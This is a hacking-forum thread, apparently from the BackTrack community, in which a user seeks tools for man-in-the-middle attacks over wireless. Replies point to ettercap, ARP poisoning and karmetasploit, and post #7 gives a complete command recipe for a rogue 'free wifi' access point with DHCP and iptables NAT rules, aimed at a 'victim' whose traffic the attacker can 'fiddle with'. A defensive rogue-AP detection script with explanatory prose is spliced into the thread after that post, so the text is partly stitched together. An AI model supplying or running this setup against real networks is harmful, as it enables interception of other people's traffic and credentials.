Page 1 of 2 (results 1 to 10 of 13)

Thread: MITM attack tools !

  1. #1
    Junior Member
    Join Date
    Oct 2008
    Posts
    82

    MITM attack tools !

    Hi to all,

    I have both BT3 final & BT4 beta installed under VirtualBox and both are working great with my ALFA AWUS036H 500mW USB wireless card. As the title of my post says, I am looking for some tools with which I can perform a man-in-the-middle attack in my wireless network.

    I have looked at Airsnarf-ng and Airbase-ng so far, but I couldn't understand the main differences between the two. Do both do the same things? It seems to me that Airsnarf has all the functionality I really need (rogue AP creation, httpd server, DNS server). These are the minimum features I need.

    So if there is a chance to make the wireless card stated above work with Airsnarf-ng, that will save me a lot of time.

    I already found a tutorial on how to set up airsnarf in BT3. I followed all the steps in it exactly, but when I ran it I couldn't really understand all the error messages.

    The link where I found this tutorial was

    http://blip.tv/file/645046

    Is airsnarf-ng still the preferred tool for MITM attacks, or are there other tools that would be worth looking at?

    I looked at this link http://backtrack.offensive-security....Howto:Airsnarf but the reason I didn't follow this HOWTO
    was that it was written somewhere in the forum that it wasn't a stable solution!

    Lastly.... if you recommend airsnarf-ng, do you suggest running it on BT3 or BT4b?

    Thank you very much and hopefully someone can give me useful information about that!

  2. #2


    ettercap is a great tool for that. I assume you want to do ARP poisoning, in which case you can do that manually too by capturing the packets using Wireshark, editing them, and sending them out using file2cable (I think that's what it's called). I would suggest the second method as it will give you a better understanding of what goes on behind the tool. Now if you want to act as a MITM between a client and an AP, I'd check out airbase. It's still in development but it's a hell of a tool if you can understand how to use it.
    Until they become conscious they will never rebel, and until after they have rebelled they cannot become conscious...

  3. #3
    Member
    Join Date
    Feb 2010
    Posts
    204


    My previous tutorials on soft-APs were based on Ubuntu 8; take a look at those threads.

  4. #4
    Member
    Join Date
    Jan 2008
    Posts
    245


    Quote Originally Posted by ioannou.alexandros View Post
    So if there is a chance to make my wireless card stated above to work with Airsnarf-ng then that will save me a lot of time.
    Normally it's for Atheros; with airbase-ng, yes, you can play with your card.

    You can use karmetasploit (airbase-ng / karma / metasploit); it works very well with rtl8187.

  5. #5
    Junior Member
    Join Date
    Oct 2008
    Posts
    82


    Quote Originally Posted by hm2075 View Post
    my previous tutorials on on soft-ap's were based on ubuntu 8, take a look at those threads
    Sorry, this is not clear to me.... Where are they? Can you please post a link, because I searched and didn't find anything.

    With which wireless card have you made that?

    Thank you!

  6. #6
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012


    Quote Originally Posted by ioannou.alexandros View Post
    Sorry, this is not clear to me.... Where are they? Can you please post a link, because I searched and didn't find anything.
    The search function is at the top of every page here.
    Try using it sometime.
    Here is another way to do it.
    Right-click the user name, open in a new tab, then select statistics, then view all threads created by the user and select the one that most closely relates to what you want to see.
    Or left click on user name, select view all posts by user.
    Good luck
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  7. #7
    Member
    Join Date
    Feb 2010
    Posts
    204


    it's easy man

    first thing

    Create fake access point
    modprobe tun                                  # load the tun/tap module so airbase-ng can create at0
    airbase-ng -e "free wifi" wlan1 -v            # soft AP with ESSID "free wifi" on wlan1, verbose
    Goto /etc/dhcp3.... and replace the contents of the dhcpd.conf file with this
    ddns-update-style ad-hoc;
    default-lease-time 600;
    max-lease-time 7200;
    subnet 10.0.0.0 netmask 255.255.255.0 {
        option routers 10.0.0.1;
        option subnet-mask 255.255.255.0;
        option domain-name "example.com";
        option domain-name-servers 10.0.0.1;
        range 10.0.0.20 10.0.0.50;
    }
    Do set up iptables

    ifconfig lo up
    ifconfig at0 up                               # at0 is the tap interface airbase-ng created
    ifconfig at0 10.0.0.1 netmask 255.255.255.0   # matches "option routers" in dhcpd.conf
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush                              # start from empty filter and nat tables
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
    iptables -P FORWARD ACCEPT
    iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
    /etc/init.d/dhcp3-server restart
    wlan0 is the gateway interface (can be eth0); 192.168.1.1 is the upstream address used in the DNAT rule.

    This setup allows your victim to connect and surf the internet through your fake AP, and you can fiddle with him.

    Edit: this setup is for BT4; you need to use dhclient instead of dhcp3-server.
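    Posts #2 and #7 describe the attacker's side (ARP poisoning, a rogue "free wifi" AP); the defender's counterpart is spotting such an AP in a scan. The following is an added example, not code from this thread or from the aircrack-ng project: it parses a simplified, constructed scan record (BSSID, channel, privacy, ESSID per line; not airodump-ng's real CSV layout) and flags BSSIDs that advertise an allowlisted SSID without being on the allowlist, as well as open APs reusing an SSID that is also seen with encryption. SAMPLE_SCAN and KNOWN_APS are constructed sample data.

```python
from collections import defaultdict

# Constructed sample scan, simplified to "BSSID, channel, privacy, ESSID" per line
# (not the real airodump-ng CSV layout; a real feed would be mapped to this shape).
SAMPLE_SCAN = """\
00:11:22:33:44:55, 6, WPA2, CoffeeShop
00:11:22:33:44:66, 11, OPN, CoffeeShop
AA:BB:CC:DD:EE:01, 1, WPA2, HomeNet
DE:AD:BE:EF:00:01, 1, OPN, free wifi
"""

# Constructed allowlist: the BSSIDs the site operator actually runs, keyed by SSID.
KNOWN_APS = {"CoffeeShop": {"00:11:22:33:44:55"}, "HomeNet": {"AA:BB:CC:DD:EE:01"}}


def parse_scan(text):
    """Turn the simplified scan text into a list of (bssid, channel, privacy, essid)."""
    rows = []
    for line in text.splitlines():
        parts = [p.strip() for p in line.split(",")]
        if len(parts) != 4 or not parts[0]:
            continue  # skip blank or malformed lines
        bssid, channel, privacy, essid = parts
        rows.append((bssid.upper(), int(channel), privacy.upper(), essid))
    return rows


def find_rogue_aps(rows, known_aps):
    """Return sorted (essid, bssid, reason) findings.

    Rule 1: a known SSID advertised by a BSSID that is not on the allowlist.
    Rule 2: an open (OPN) AP using an SSID that is also seen encrypted, which is
    the classic evil-twin pattern an airbase-ng soft AP produces next to a real one.
    """
    findings = []
    privacy_by_essid = defaultdict(set)
    for bssid, _ch, privacy, essid in rows:
        privacy_by_essid[essid].add(privacy)
        if essid in known_aps and bssid not in known_aps[essid]:
            findings.append((essid, bssid, "unknown BSSID for allowlisted SSID"))
    for bssid, _ch, privacy, essid in rows:
        if privacy == "OPN" and len(privacy_by_essid[essid]) > 1:
            findings.append((essid, bssid, "open AP reusing an encrypted SSID"))
    return sorted(set(findings))


if __name__ == "__main__":
    for essid, bssid, reason in find_rogue_aps(parse_scan(SAMPLE_SCAN), KNOWN_APS):
        print(f"{essid!r} from {bssid}: {reason}")
```

    A plain "free wifi" SSID with no encrypted sibling is not flagged by these two rules; it would need a third, site-specific rule (for example, any open SSID not on the allowlist).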

  8. #8
    Junior Member
    Join Date
    Oct 2008
    Posts
    82


    I spent at least three hours going through all the posts in the thread you made about building a fake AP.

    The commands posted in your thread are already written down by hand for testing later, because at the moment I am feeling a little tired.

    Once I try it out I will let you immediately know about the results and I might also ask you a few more things.

    BTW it was the best tutorial I ever read and pretty much everything was understood. Well done, and I would like to thank you and the others that helped build this great tutorial.

    Sorry about making you post the code again in my thread.... I wish I had checked my thread earlier so you wouldn't have spent your time posting the whole code again in my thread!

  9. #9
    Junior Member
    Join Date
    Oct 2008
    Posts
    82


    Quote Originally Posted by archangel.amael View Post
    Right-click the user name, open in a new tab, then select statistics, then view all threads created by the user and select the one that most closely relates to what you want to see.
    Good luck
    Thank you very much for your help. Now I know exactly how it works. I hope I won't forget it next time!

  10. #10
    Member
    Join Date
    Feb 2010
    Posts
    204


    No probs, I already had it open because I was working on the wireless key grabber, so it's only a slight deviation.

    Maybe next weekend I'll redo the transparent fake access point for BT4.

    It's much easier in BT4; I have a bit more experience with Ubuntu.
